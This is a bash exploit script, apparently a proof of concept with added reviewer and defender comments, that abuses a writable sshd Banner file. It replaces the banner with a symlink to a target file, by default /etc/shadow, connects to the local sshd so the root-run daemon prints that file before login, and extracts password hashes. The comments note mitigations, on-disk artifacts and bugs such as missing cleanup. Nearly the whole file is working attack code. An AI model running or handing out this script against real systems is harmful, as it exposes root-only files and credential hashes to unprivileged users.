#!/bin/bash
# By: oxagast
#
# woahisread
# this exploit depends on "Banner" being pointed at a file that
# exists in a dir writeable by the user running the exploit, and
# that the file can be removed/moved by that user.  Basically the
# banner file should be checked for proper permissions, as being
# owned by root and writeable only by root, and sshd fails to do
# this.  This allows you to create a symlink and read the file it
# points to as the user running the openssh process, which is
# normally root.
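useage()
{
  # Print invocation help. Both lines go to stderr (the original sent
  # "Usage:" to stdout and the example to stderr, so a caller capturing
  # stdout got half the message). Does not exit; callers decide that.
  printf 'Usage:\n' 1>&2
  printf '  %s -p 22 -s 127.0.0.1 -f /etc/shadow\n' "$0" 1>&2
}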

# Flow: parse flags -> read the Banner path from sshd_config -> swap the
# banner file for a symlink to the target -> connect to the local sshd so
# it sends the banner (now the symlink target's contents) before
# authentication -> recover the captured text.
# Preconditions (see file header): the invoking user can rename/replace
# the file named by Banner, and sshd does not validate its ownership.
# Defender notes:
#   - Mitigation: point Banner at a root-owned file inside a root-owned,
#     non-world-writable directory, or leave Banner unset.
#   - Artifacts this script leaves on disk: "$BPATH.bak", the symlink at
#     $BPATH (only restored on one path, see below), /tmp/sshexp.1 and
#     ./out holding the leaked contents. The unauthenticated connection
#     attempt is presumably visible in sshd's log -- verify.
echo "[*] WoahIsRead sshd 9.2 banner symbolic link exploit"
# Options: -s host, -p port, -f file to read. Each has a default below.
while getopts ":s:p:f:" o; do
  case "${o}" in
    p)
      p=${OPTARG}
      # NOTE(review): this is an equality test, not a range check -- only
      # p==1 or p==65535 pass. Any other value prints usage, but since
      # useage() does not exit, execution continues with that port.
      ((p == 1 || p == 65535)) || useage
      ;;
    s)
      s=${OPTARG}
      ;;
    f)
      f=${OPTARG}
      ;;
    ?)
      # Unknown flag: usage is printed but the script keeps going.
      useage
      ;;
  esac
done
shift $((OPTIND - 1))
# Defaults for target file, port and host. `[[ ! $f ]]` is true when
# the variable is unset or empty.
if [[ ! $f ]]; then
  f="/etc/shadow"
fi
if [[ ! $p ]]; then
  p="22"
fi
if [[ ! $s ]]; then
  s="127.0.0.1"
fi
# Banner path: only /etc/ssh/sshd_config is read (files pulled in by an
# Include directive are not followed), the config must be readable by
# the invoking user, and the pattern requires exactly one space after
# "Banner" (a tab separator would not match). With no Banner line at all
# BPATH is empty -- see the "none" check below.
BPATH=$(grep -i "^Banner " /etc/ssh/sshd_config | cut -d ' ' -f 2)
# First comma-separated field of `sshd -V` (the version string; sshd
# must be on PATH for this to produce anything useful).
VER=$(sshd -V 2>&1 | cut -d ',' -f 1)
# Owner of the target file; `stat -c` is the GNU coreutils form.
# $f is unquoted here and below, so a path containing whitespace breaks.
OWN=$(stat -c "%U" $f)
echo "[*] SSHD Version:          $VER"
echo "[*] SSHD Banner path is:   $BPATH"
echo "[*] SSHD Banner owner is:  $OWN"
# Only the literal value "none" is rejected. An empty BPATH (no Banner
# directive found, or config unreadable) passes this guard, and the
# `ln -s` below then runs without a proper link name.
if [[ $BPATH == "none" ]]; then
echo "[x] SSHD Banner must be set to a user owned file"
exit 1
fi
# Replace the banner file with a symlink to the target. If the banner
# file exists it is first renamed to "$BPATH.bak" and MOV=1 records that
# a restore is needed; otherwise only the symlink is created and MOV
# stays unset. Both operations need write permission on the banner's
# directory, not on the banner file itself -- that is the misconfiguration
# the file header describes.
if test -e $BPATH; then
  mv $BPATH $BPATH.bak
  ln -s $f $BPATH
  MOV=1
else
  ln -s $f $BPATH
fi
echo "[*] SSHing to ourselves... $s:$p"
# BatchMode=true suppresses interactive prompts; only the banner sshd
# sends before authentication is wanted, so the login itself is expected
# to fail. Output is captured to a fixed, predictable path in /tmp (not
# mktemp), which also leaves the leaked data on disk afterwards.
ssh -o BatchMode=true $s -p $p 2>&1 | tee /tmp/sshexp.1 >/dev/null
# Drop the last line (GNU `head -n -N` = all but the last N lines),
# presumably the ssh error that follows the banner -- verify. Result is
# written to ./out in the current working directory.
head -n -1 /tmp/sshexp.1 >out
if [[ $f == "/etc/shadow" ]]; then
  # Heuristic success test: the first captured line mentions "root"
  # (typically the first entry of /etc/shadow).
  if [[ $(head -n 1 out | grep root) ]]; then
    # Print only lines whose password field looks like a crypt hash with a
    # single-character id between dollar signs (e.g. $6$); multi-character
    # ids are not matched by this pattern.
    grep ':\$.\$' out
    echo "[!] Exploit complete, cleaning up..."
    # Restore the original banner file (mv over the symlink replaces it).
    # Nothing is done when MOV is unset, i.e. when no banner file existed.
    if [[ $MOV -eq 1 ]]; then
      mv $BPATH.bak $BPATH
    fi
    exit 0
  else
    # NOTE(review): no cleanup on this path -- the symlink stays at
    # $BPATH and sshd keeps serving the target file's contents as its
    # banner to every client until someone restores the original.
    echo "[x] Sorry, exploit failed."
    exit 1
  fi
else
  # Non-shadow target: dump everything captured. Same cleanup caveat as
  # above: the symlink and the .bak file are left in place.
  cat out
  exit 0
fi